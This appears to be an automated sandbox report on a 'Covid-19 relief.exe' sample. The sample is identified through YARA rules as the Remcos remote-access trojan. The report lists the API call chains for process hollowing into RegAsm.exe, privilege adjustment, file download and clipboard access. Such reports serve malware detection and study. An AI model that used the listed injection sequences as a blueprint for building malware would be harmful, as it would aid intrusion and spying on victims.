            Source: Yara match | File source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 1_2_057B1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,1_2_057B1C09
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 1_2_057B00AD NtOpenSection,NtMapViewOfSection,1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 3_2_05791C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,3_2_05791C09
            Source: C:\Users\user\Desktop\Covid-19 relief.exe | Code function: 3_2_057900AD NtOpenSection,NtMapViewOfSection,3_2_057900AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait5_2_0040D2A6
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304DF1_2_00C304DF
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304F01_2_00C304F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A62_2_0040D2A6
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D704DF3_2_00D704DF
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D704F03_2_00D704F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D2A65_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413E72 appears 49 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041203B appears 31 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413E72 appears 98 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041203B appears 62 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414176 appears 50 times
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927312165.0000000006E70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000003.00000002.927477346.0000000004DA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: Covid-19 relief.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Covid-19.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/3@17/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0040EC0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_0040EC0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00409A2F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_00409D02
